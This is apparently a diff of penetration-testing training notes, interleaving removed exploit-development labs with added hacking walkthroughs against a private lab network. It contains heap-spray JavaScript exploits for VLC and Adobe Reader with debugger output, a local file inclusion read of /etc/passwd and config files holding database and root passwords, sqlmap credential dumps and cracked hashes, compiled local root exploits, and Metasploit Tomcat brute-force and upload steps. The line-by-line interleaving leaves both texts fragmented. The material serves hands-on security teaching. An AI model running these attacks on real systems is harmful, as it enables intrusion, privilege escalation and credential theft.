996	-	smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
996	+
997		The target network range is:
998	-	Exploit Scripts
998	+	172.31.2.0/24
999	-	- ffvlc
999	+
1000
1001	-	ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
1001	+	You can do any attack EXCEPT man-in-the-middle attacks, and please DO NOT attack any other IP ranges.
1002
1003	-	perl daemon.pl vlc0.html
1003	+
1004
1005	-	ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
1005	+
1006	-	Browse to http://your_host_ip_address:8080/
1006	+
1007
1008	-	vlc0.html
1008	+
1009	-	---------
1009	+
1010
1011	-	var buf = "";
1011	+
1012	-	for(i = 0; i < 1250; i++)
1012	+	----------------------------------------------------------------------------------------------------------------------------------------
1013	-	buf += unescape("%41%41%41%41");
1013	+	Some tools to install:
1014	-	var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
1014	+	---------------------------Type This-----------------------------------
1015	-	document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
1015	+	wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
1016		gcc propecia.c -o propecia
1017		sudo cp propecia /bin
1018	-	vlc1.html
1018	+	-----------------------------------------------------------------------
1019	-	---------
1019	+
1020
1021
1022	-	// shellcode created in heap memory
1022	+
1023	-	var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
1023	+
1024		Step 1: Portscan the server
1025	-	// 800K block of NOPS
1025	+	---------------------------Type This-----------------------------------
1026	-	var nop = unescape("%u9090%u09090"); // 4 NOPS
1026	+	sudo nmap -sS 172.31.2.139
1027	-	while(nop.length < 0xc0000) {
1027	+	-----------------------------------------------------------------------
1028	-	nop += nop;
1028	+
1029		Step 2: Version scan the server
1030		---------------------------Type This-----------------------------------
1031	-	// spray the heap with NOP+shellcode
1031	+	sudo nmap -sV -p22,80 172.31.2.139
1032	-	var memory = new Array();
1032	+	-----------------------------------------------------------------------
1033	-	for(i = 0; i < 50; i++) {
1033	+
1034	-	memory[i] = nop + shellcode;
1034	+
1035
1036		Step 3: Vulnerability scan the webserver
1037	-	// build the exploit payload
1037	+	---------------------------Type This-----------------------------------
1038	-	var buf = "";
1038	+	cd ~/toolz/
1039	-	for(i = 0; i < 1250; i++)
1039	+
1040	-	buf += unescape("%41%41%41%41");
1040	+	rm -rf nikto*
1041	-	var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
1041	+
1042		git clone https://github.com/sullo/nikto.git Nikto2
1043	-	// trigger the exploit
1043	+
1044	-	document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
1044	+	cd Nikto2/program
1045
1046		perl nikto.pl -h 172.31.2.139
1047	-	perl daemon.pl vlc1.html
1047	+	-----------------------------------------------------------------------
1048
1049	-	Search for where our NOPS+shellcode lies in the heap
1049	+
1050
1051	-	s 0 l fffffff 90 90 90 90 cc cc cc cc
1051	+
1052		Step 4: Directory brute-force the webserver
1053	-	0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
1053	+	---------------------------Type This-----------------------------------
1054	-	03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1054	+	cd ~/toolz
1055	-	040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1055	+
1056	-	043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1056	+	sudo apt install -y libcurl4-openssl-dev
1057	-	046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1057	+
1058	-	049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1058	+	git clone https://github.com/v0re/dirb.git
1059	-	04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1059	+
1060	-	04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1060	+	cd dirb/
1061	-	052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1061	+
1062	-	055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1062	+	./configure
1063	-	058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1063	+
1064	-	05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1064	+	make
1065	-	05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1065	+
1066	-	061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1066	+	dirb
1067	-	064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1067	+
1068	-	067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1068	+	./dirb http://172.31.2.139 wordlists/big.txt
1069	-	06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
1069	+	-----------------------------------------------------------------------
1070
1071	-	Edit vlc2.html
1071	+
1072	-	replace %41%41%41%41 with %07%07%07%07
1072	+
1073
1074	-	(928.fd0): Break instruction exception - code 80000003 (first chance)
1074	+
1075	-	eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
1075	+
1076	-	eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
1076	+
1077	-	cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
1077	+
1078	-	07100000 cc int 3
1078	+
1079	-	0:019> u
1079	+
1080	-	07100000 cc int 3
1080	+
1081	-	07100001 cc int 3
1081	+
1082	-	07100002 cc int 3
1082	+
1083	-	07100003 cc int 3
1083	+	----------------------------------------------------------------------------------------------------------------------------------------------
1084	-	07100004 cc int 3
1084	+
1085	-	07100005 cc int 3
1085	+
1086	-	07100006 cc int 3
1086	+
1087	-	07100007 cc int 3
1087	+
1088
1089	-	Create vlc3.html (Copy vlc2.html to vlc3.html)
1089	+
1090		Attack steps:
1091	-	Win32 Reverse Shell
1091	+	-------------
1092	-	- no restricted characters
1092	+
1093	-	- Encoder NONE
1093	+
1094	-	- use the Javascript encoded payload generated by msfweb
1094	+	Step 1: Ping sweep the target network
1095		-------------------------------------
1096
1097
1098		---------------------------Type This-----------------------------------
1099		nmap -sP 172.31.2.0/24
1100	-	# Lab 4: PDF EXPLOITS #
1100	+	-----------------------------------------------------------------------
1101
1102		Found 4 hosts:
1103		172.31.2.47
1104	-	cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab4\adobe_mnp_skeleton
1104	+	172.31.2.47
1105	-	Acrobat Media newPlayer exploit
1105	+	172.31.2.157
1106		172.31.2.217
1107
1108	-	Use-after-free bug
1108	+
1109		Step 2: Port scan target system
1110	-	Exploit scripts are online at 172.16.0.100
1110	+
1111	-	- adobe_mnp
1111	+
1112
1113	-	Download these scripts on your Strategicsec-XP-ED-Target-VM VM itself.
1113	+	---------------------------Type This-----------------------------------
1114		sudo nmap -sV 172.31.2.47
1115		-----------------------------------------------------------------------
1116	-	mnp0.pdf
1116	+
1117
1118	-	- Open up acrobat reader
1118	+
1119	-	- WinDBG
1119	+	PORT STATE SERVICE VERSION
1120	-	- F6 attach to AcroRd32.exe
1120	+	22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
1121	-	- g to Go
1121	+	80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
1122		514/tcp filtered shell
1123	-	EIP = 41414141
1123	+	Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1124
1125	-	Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
1125	+
1126
1127	-	mnp1.pdf
1127	+	Step 3: Vulnerability Scan the webserver
1128		----------------------------------------
1129	-	All we are doing is changing EIP to 0c0c0c0c.
1129	+
1130	-	There is no heap spray in this one.
1130	+
1131		---------------------------Type This-----------------------------------
1132	-	This exception may be expected and handled.
1132	+	cd ~/toolz/
1133	-	eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
1133	+
1134	-	eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
1134	+	rm -rf nikto*
1135	-	cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
1135	+
1136	-	0c0c0c0c ?? ???
1136	+	git clone https://github.com/sullo/nikto.git Nikto2
1137
1138	-	We know we get EIP control
1138	+	cd Nikto2/program
1139
1140	-	mnp2.pdf
1140	+	perl nikto.pl -h 172.31.2.47
1141		-----------------------------------------------------------------------
1142	-	Put in the heap spray.
1142	+
1143
1144	-	var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
1144	+	Step 4: Run dirbuster or similar directory bruteforce tool against the target
1145		-----------------------------------------------------------------------------
1146	-	var nops = unescape("%u9090%u9090");
1146	+
1147
1148	-	while(nops.length <= 32768)
1148	+	---------------------------Type This-----------------------------------
1149	-	nops += nops;
1149	+	wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
1150	-	nops = nops.substring(0,32768 - shellcode.length);
1150	+
1151		perl Webr00t.pl -h 172.31.2.47 -v \| grep -v "404 Not Found"
1152	-	memory = new Array();
1152	+	-----------------------------------------------------------------------
1153
1154	-	for(i = 0; i < 1500; i++) {
1154	+
1155	-	memory[i] = nops + shellcode;
1155	+
1156		Step 5: Browse the web site to look for clues
1157		---------------------------------------------
1158	-	1500 NOP+shellcode blocks of 32K NOPs each
1158	+	Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
1159
1160	-	We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
1160	+
1161		http://172.31.2.47/test
1162	-	We want to see what led to the crash.
1162	+	http://172.31.2.47/test.php (got the following error message)
1163		'file' parameter is empty. Please provide file path in 'file' parameter
1164	-	EIP is invalid, so we can't disassemble around EIP
1164	+
1165		Figured this was a Local File Include (LFI) so I tried:
1166	-	We need to trace the function that called us and crashed.
1166	+	http://172.31.2.47/test.php?file=/etc/passwd
1167	-	- STACK TRACE
1167	+	http://172.31.2.47/test.php?file=/etc/passwd%00
1168	-	- Dumps all the frames from the top of the stack.
1168	+
1169	-	- show you the series of calls that led up to the crash.
1169	+	None of these worked so I tried it as a POST request with curl (reference: https://pastebin.com/yfBz5H7b)
1170	-	- we will analyze the topmost function on the frame.
1170	+	---------------------------Type This-----------------------------------
1171		curl -X POST -F 'file=/etc/passwd' http://172.31.2.47/test.php
1172	-	WinDBG - stack trace - "k" command
1172	+	-----------------------------------------------------------------------
1173
1174	-	0:000> k
1174	+
1175	-	ChildEBP RetAddr
1175	+
1176	-	WARNING: Frame IP not in any known module. Following frames may be wrong.
1176	+	http://172.31.2.47/a
1177	-	0013fb34 2d843117 0x90909090
1177	+	http://172.31.2.47/b
1178	-	0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
1178	+	http://172.31.2.47/c (a and b gave 404 errors, but "c" is a blank page, and view source is blank as well - this must be a config file"
1179	-	0013fbdc 23825d8c EScript!PlugInMain+0x25584
1179	+
1180	-	0013fc74 238257e2 EScript!PlugInMain+0x249dc
1180	+	So let's try that POST request with curl to pull down the c.php config file.
1181	-	0013fca4 238543c5 EScript!PlugInMain+0x24432
1181	+
1182	-	0013fd04 00a78de1 EScript!PlugInMain+0x53015
1182	+	---------------------------Type This-----------------------------------
1183	-	0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
1183	+	curl -X POST -F 'file=/var/www/html/c.php' http://172.31.2.47/test.php
1184	-	0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
1184	+	curl -X POST -F 'file=/var/htdocs/c.php' http://172.31.2.47/test.php
1185	-	0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
1185	+	curl -X POST -F 'file=/var/www/c.php' http://172.31.2.47/test.php
1186	-	0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
1186	+	-----------------------------------------------------------------------
1187	-	0013fe24 00a323b4 USER32!DispatchMessageW+0xf
1187	+
1188	-	0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
1188	+	<?php
1189	-	0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
1189	+	#header( 'Z-Powered-By:its chutiyapa xD' );
1190	-	0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
1190	+	header('X-Frame-Options: SAMEORIGIN');
1191	-	0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
1191	+	header( 'Server:testing only' );
1192	-	0013ffc0 7c817067 AcroRd32+0x4004
1192	+	header( 'X-Powered-By:testing only' );
1193	-	0013fff0 00000000 kernel32!BaseProcessStart+0x23
1193	+
1194		ini_set( 'session.cookie_httponly', 1 );
1195	-	2d843117 -- the return address that we would have returned to, if we didnt crash.
1195	+
1196	-	address 2d843117-2 we will have a CALL instruction.
1196	+	$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
1197
1198	-	u 2d843117
1198	+	// Check connection
1199	-	u 2d843117-2
1199	+	if (mysqli_connect_errno())
1200	-	u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
1200	+	{
1201	-	u 2d843117-4
1201	+	echo "connection failed -> " . mysqli_connect_error();
1202		}
1203	-	0:000> u 2d843117-3
1203	+
1204	-	Multimedia!PlugInMain+0x41b66:
1204	+	?>
1205	-	2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
1205	+
1206	-	2d843117 6a00 push 0
1206	+
1207	-	2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
1207	+
1208	-	2d84311e 56 push esi
1208	+	---------------------------Type This-----------------------------------
1209	-	2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
1209	+	ssh -l billu 172.31.2.47
1210	-	2d843124 83c40c add esp,0Ch
1210	+	b0x_billu
1211	-	2d843127 66b80100 mov ax,1
1211	+	-----------------------------------------------------------------------
1212	-	2d84312b 5e pop esi
1212	+
1213
1214	-	We control EDX
1214	+
1215	-	edx=0c0c0c0c
1215	+	http://172.31.2.47/phpmyadmin
1216		http://172.31.2.47/phpMyAdmin
1217	-	call [edx+4] = call [0c0c0c10]
1217	+	http://172.31.2.47/pma
1218	-	dd edx+4
1218	+	http://172.31.2.47/phpmy
1219
1220	-	0:000> dd edx+4
1220	+
1221	-	0c0c0c10 90909090 90909090 90909090 90909090
1221	+	Then I Googled config file name for phpmyadmin (config.inc.php)
1222	-	0c0c0c20 90909090 90909090 90909090 90909090
1222	+
1223		---------------------------Type This-----------------------------------
1224	-	0:000> u 2d843117-7
1224	+	curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://172.31.2.47/test.php
1225	-	Multimedia!PlugInMain+0x41b62:
1225	+	-----------------------------------------------------------------------
1226	-	2d843110 8b10 mov edx,dword ptr [eax]
1226	+	<?php
1227	-	2d843112 8bc8 mov ecx,eax
1227	+
1228	-	2d843114 ff5204 call dword ptr [edx+4]
1228	+	/* Servers configuration */
1229		$i = 0;
1230	-	dd eax
1230	+
1231		/* Server: localhost [1] */
1232	-	0:000> dd eax
1232	+	$i++;
1233	-	02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
1233	+	$cfg['Servers'][$i]['verbose'] = 'localhost';
1234	-	02e2d690 42424242 42424242 42424242 42424242
1234	+	$cfg['Servers'][$i]['host'] = 'localhost';
1235	-	02e2d6a0 42424242 42424242 42424242 42424242
1235	+	$cfg['Servers'][$i]['port'] = '';
1236	-	02e2d6b0 42424242 42424242 42424242 42424242
1236	+	$cfg['Servers'][$i]['socket'] = '';
1237	-	02e2d6c0 42424242 42424242 00000000 00000000
1237	+	$cfg['Servers'][$i]['connect_type'] = 'tcp';
1238		$cfg['Servers'][$i]['extension'] = 'mysqli';
1239	-	mnp3.pdf
1239	+	$cfg['Servers'][$i]['auth_type'] = 'cookie';
1240		$cfg['Servers'][$i]['user'] = 'root';
1241	-	change the NOPs 90909090 to 0c0c0c0c
1241	+	$cfg['Servers'][$i]['password'] = 'roottoor';
1242		$cfg['Servers'][$i]['AllowNoPassword'] = true;
1243	-	mov edx, [eax]
1243	+
1244	-	call [edx+4]
1244	+
1245		---------------------------Type This-----------------------------------
1246	-	edx = 0c0c0c0c
1246	+	ssh -l root 172.31.2.47
1247	-	edx+4 = 0c0c0c10
1247	+	roottoor
1248	-	contents at edx+4 will also be "0c0c0c0c"
1248	+	-----------------------------------------------------------------------
1249
1250	-	EIP will jump to 0c0c0c0c
1250	+
1251
1252	-	and...
1252	+
1253
1254	-	0:000> u 0c0c0c0c
1254	+
1255	-	*** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
1255	+	---------------------------------------------------------------------------------------------------------------------------------------------------------
1256	-	*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
1256	+
1257	-	0c0c0c0c 0c0c or al,0Ch
1257	+	Attack steps:
1258	-	0c0c0c0e 0c0c or al,0Ch
1258	+	-------------
1259	-	0c0c0c10 0c0c or al,0Ch
1259	+
1260	-	0c0c0c12 0c0c or al,0Ch
1260	+
1261	-	0c0c0c14 0c0c or al,0Ch
1261	+
1262		Step 1: Ping sweep the target network
1263		-------------------------------------
1264
1265
1266		---------------------------Type This-----------------------------------
1267		nmap -sP 172.31.2.0/24
1268		-----------------------------------------------------------------------
1269
1270
1271
1272		- Found 3 hosts
1273		172.31.2.64
1274		172.31.2.217
1275		172.31.2.238
1276
1277
1278
1279		Step 2: Port scan target system
1280		-------------------------------
1281
1282
1283		---------------------------Type This-----------------------------------
1284		nmap -sV 172.31.2.64
1285		-----------------------------------------------------------------------
1286
1287
1288
1289		-------------Scan Results--------------------------------------------
1290		PORT STATE SERVICE VERSION
1291		22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
1292		80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1293		514/tcp filtered shell
1294		1037/tcp filtered ams
1295		6667/tcp open irc ngircd
1296		Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
1297		--------------------------------------------------------------------
1298
1299
1300		Step 3: Vulnerability Scan the webserver
1301		----------------------------------------
1302
1303
1304		---------------------------Type This-----------------------------------
1305		cd ~/toolz/
1306
1307		rm -rf nikto*
1308
1309		git clone https://github.com/sullo/nikto.git Nikto2
1310
1311		cd Nikto2/program
1312
1313		perl nikto.pl -h 172.31.2.64
1314		-----------------------------------------------------------------------
1315
1316
1317		Step 4: Run dirbuster or similar directory bruteforce tool against the target
1318		-----------------------------------------------------------------------------
1319
1320
1321		---------------------------Type This-----------------------------------
1322		wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
1323
1324		perl Webr00t.pl -h 172.31.2.64 -v
1325		-----------------------------------------------------------------------
1326
1327
1328
1329		Step 5: Browse the web site to look for clues
1330		---------------------------------------------
1331		Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
1332
1333
1334		..... really didn't get much from here so we just opened the web page in a browser
1335		http://172.31.2.64/
1336
1337		.....browsed to the webpage and saw that it pointed to:
1338		http://172.31.2.64/jabc
1339
1340		....clicked on documentation link and found hidden text that pointed to here:
1341		http://172.31.2.64/jabcd0cs/
1342
1343		....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
1344		https://www.exploit-db.com/exploits/32075/
1345
1346		Tried the sql injection described in exploit-db:
1347		http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
1348
1349		http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
1350
1351
1352
1353		Tried to run sqlmap against the target
1354
1355
1356		---------------------------Type This-----------------------------------
1357		cd sqlmap-dev/
1358		python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
1359
1360		python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
1361
1362		python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
1363
1364		python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
1365
1366		python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
1367		-----------------------------------------------------------------------
1368
1369
1370
1371		FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
1372		FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
1373
1374
1375
1376		---------------------------Type This-----------------------------------
1377		python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
1378
1379		python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
1380		-----------------------------------------------------------------------
1381
1382		username: webmin
1383		hash: b78aae356709f8c31118ea613980954b
1384
1385		https://hashkiller.co.uk/md5-decrypter.aspx
1386
1387		hash: b78aae356709f8c31118ea613980954b
1388		pass: webmin1980
1389
1390
1391		ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
1392
1393
1394
1395		---------------------------Type This-----------------------------------
1396		ssh -l webmin 172.31.2.64
1397		webmin1980
1398
1399		id
1400
1401		cat /etc/*release
1402		-----------------------------------------------------------------------
1403
1404
1405
1406		....tired of not having a real command shell...
1407
1408
1409		---------------------------Type This-----------------------------------
1410		python -c 'import pty;pty.spawn("/bin/bash")'
1411
1412
1413		cd /tmp
1414
1415		pwd
1416
1417
1418		cat >> exploit.c << out
1419
1420		************paste in the content from here ***************
1421		https://www.exploit-db.com/raw/39166/
1422
1423
1424		------ hit enter a few times ------
1425
1426		------ then type 'out' ----- this closes the file handle...
1427
1428
1429
1430		---------------------------Type This-----------------------------------
1431		gcc -o boom exploit.c
1432
1433		./boom
1434		-----------------------------------------------------------------------
1435
1436
1437		------------exploit failed, damn let's try another one ---------
1438
1439
1440
1441		---------------------------Type This-----------------------------------
1442		cat >> exploit2.c << out
1443
1444		************paste in the content from here ***************
1445		https://www.exploit-db.com/raw/37292/
1446
1447
1448		out
1449
1450
1451		gcc -o boom2 exploit2.c
1452
1453		./boom2
1454
1455		id
1456
1457
1458		......YEAH - do the happy dance!!!!
1459
1460
1461
1462
1463		---- Previous class attack process -------
1464
1465
1466		#########################
1467		# Building a quick list #
1468		#########################
1469
1470		---------------------------Type This-----------------------------------
1471
1472		cd ~
1473		echo bob >> list.txt
1474		echo jim >> list.txt
1475		echo joe >> list.txt
1476		echo tim >> list.txt
1477		echo admin >> list.txt
1478		echo hello >> list.txt
1479		echo rob >> list.txt
1480		echo test >> list.txt
1481		echo aaaaaa >> list.txt
1482		echo larry >> list.txt
1483		echo mario >> list.txt
1484		echo jason >> list.txt
1485		echo john >> list.txt
1486		-----------------------------------------------------------------------
1487
1488
1489		###########################################################
1490		# Let's start with some basic scanning of the lab network #
1491		###########################################################
1492
1493		---------------------------Type This-----------------------------------
1494
1495		infosecaddicts@ubuntu:~$ nmap -sP 172.31.2.0/24
1496		-----------------------------------------------------------------------
1497
1498		Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:17 EST
1499		Nmap scan report for 172.31.2.24
1500		Host is up (0.046s latency).
1501		Nmap scan report for 172.31.2.47
1502		Host is up (0.045s latency).
1503		Nmap scan report for 172.31.2.64
1504		Host is up (0.037s latency).
1505		Nmap scan report for 172.31.2.86
1506		Host is up (0.040s latency).
1507		Nmap scan report for 172.31.2.117
1508		Host is up (0.038s latency).
1509		Nmap scan report for 172.31.2.139
1510		Host is up (0.037s latency).
1511		Nmap scan report for 172.31.2.157
1512		Host is up (0.036s latency).
1513		Nmap scan report for 172.31.2.217
1514		Host is up (0.047s latency).
1515		Nmap scan report for 172.31.2.238
1516		Host is up (0.036s latency).
1517		Nmap done: 256 IP addresses (9 hosts up) scanned in 3.22 seconds
1518
1519
1520
1521
1522
1523
1524		---------------------------Type This-----------------------------------
1525
1526		infosecaddicts@ubuntu:~$ sudo nmap -sS 172.31.2.24
1527		-----------------------------------------------------------------------
1528
1529		[sudo] password for infosecaddicts:
1530
1531		Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:18 EST
1532		Nmap scan report for 172.31.2.24
1533		Host is up (1.8s latency).
1534		Not shown: 989 closed ports
1535		PORT STATE SERVICE
1536		25/tcp open smtp
1537		80/tcp open http
1538		111/tcp open rpcbind
1539		139/tcp open netbios-ssn
1540		445/tcp open microsoft-ds
1541		514/tcp filtered shell
1542		1322/tcp open novation
1543		2049/tcp open nfs
1544		8080/tcp open http-proxy
1545		8081/tcp open blackice-icecap
1546		9000/tcp open cslistener
1547
1548		Nmap done: 1 IP address (1 host up) scanned in 133.56 seconds
1549
1550
1551
1552
1553
1554
1555
1556		---------------------------Type This-----------------------------------
1557
1558		infosecaddicts@ubuntu:~$ sudo nmap -sV -p25,80,111,139,445,1322,2049,8080,8081,9000 172.31.2.24
1559		-----------------------------------------------------------------------
1560
1561		Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:21 EST
1562		Nmap scan report for 172.31.2.24
1563		Host is up (0.031s latency).
1564		PORT STATE SERVICE VERSION
1565		25/tcp open ftp vsftpd 3.0.2
1566		80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1567		111/tcp open rpcbind 2-4 (RPC #100000)
1568		139/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
1569		445/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
1570		1322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
1571		2049/tcp open nfs_acl 2-3 (RPC #100227)
1572		8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1573		8081/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1574		9000/tcp open http Jetty winstone-2.9
1575		Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
1576
1577		Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1578		Nmap done: 1 IP address (1 host up) scanned in 15.15 seconds
1579
1580
1581
1582
1583
1584
1585
1586
1587		###########################
1588		# Day 1: Attacking Kevgir #
1589		###########################
1590
1591
1592		****** Attacking Kevgir ******
1593		I figured I've give you something fun to play with.
1594
1595
1596
1597		###############
1598		# Using Nikto #
1599		###############
1600
1601		---------------------------Type This-----------------------------------
1602
1603		cd ~/toolz/
1604
1605		rm -rf nikto*
1606
1607		git clone https://github.com/sullo/nikto.git Nikto2
1608
1609		cd Nikto2/program
1610
1611		perl nikto.pl -h 172.31.2.24
1612
1613		perl nikto.pl -h 172.31.2.24:8080
1614
1615		perl nikto.pl -h 172.31.2.24:8081
1616
1617		perl nikto.pl -h 172.31.2.24:9000
1618
1619		-----------------------------------------------------------------------
1620
1621
1622
1623		####################
1624		# Using Metasploit #
1625		####################
1626
1627		---------------------------Type This-----------------------------------
1628
1629		cd ~/toolz/metasploit
1630
1631		./msfconsole
1632
1633		use auxiliary/scanner/http/http_version
1634
1635		set RHOSTS 172.31.2.24
1636
1637		set RPORT 8080
1638
1639		run
1640
1641
1642		-------------------------------
1643
1644		use auxiliary/scanner/http/tomcat_enum
1645
1646		set RHOSTS 172.31.2.24
1647
1648		set RPORT 8080
1649
1650		run
1651		-----------------------------------------------------------------------
1652
1653
1654
1655
1656
1657		####################
1658		# Attacking Tomcat #
1659		####################
1660
1661		---------------------------Type This-----------------------------------
1662
1663		use auxiliary/scanner/http/http_version
1664
1665		set RHOSTS 172.31.2.24
1666
1667		set RPORT 8080
1668
1669		run
1670
1671
1672		-------------------------------
1673
1674
1675		use auxiliary/scanner/http/tomcat_mgr_login
1676
1677		set USERNAME tomcat
1678
1679		set USERPASS_FILE /home/infosecaddicts/list.txt
1680
1681		set STOP_ON_SUCCESS true
1682
1683		set RHOSTS 172.31.2.24
1684
1685		set RPORT 8080
1686
1687		run
1688
1689
1690		-------------------------------
1691
1692		use exploit/multi/http/tomcat_mgr_upload
1693
1694		set HttpUsername tomcat
1695
1696		set HttpPassword tomcat
1697
1698		set RHOST 172.31.2.24
1699
